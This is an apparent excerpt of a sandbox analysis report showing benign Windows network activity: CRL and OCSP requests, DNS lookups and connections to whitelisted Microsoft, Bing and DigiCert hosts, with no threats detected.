5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\Swi4yFavETfuSZ9mHxnUvb4UdTw[1].jsbinary
MD5:B2C3CBF8A1D940D6C83D59A67486675C
SHA256:08EA9109346E9018ED50567503D2C141F7A84CFDE80EB25E97FDDCFE270BAA67
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].jsbinary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
60
DNS requests
38
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3584
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3584
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4128
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3584
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3584
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
92.123.104.62:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1176
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.78
whitelisted
www.bing.com
  • 92.123.104.62
  • 92.123.104.59
  • 92.123.104.52
  • 92.123.104.61
  • 92.123.104.34
  • 92.123.104.47
  • 92.123.104.25
  • 92.123.104.33
  • 92.123.104.32
  • 2.21.65.154
  • 2.21.65.132
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.20
  • 20.190.160.14
  • 40.126.32.134
  • 40.126.32.136
  • 40.126.32.76
  • 40.126.32.138
  • 20.190.160.17
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
go.microsoft.com
  • 69.192.162.125
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.31.169.57
whitelisted

Threats

No threats detected
No debug info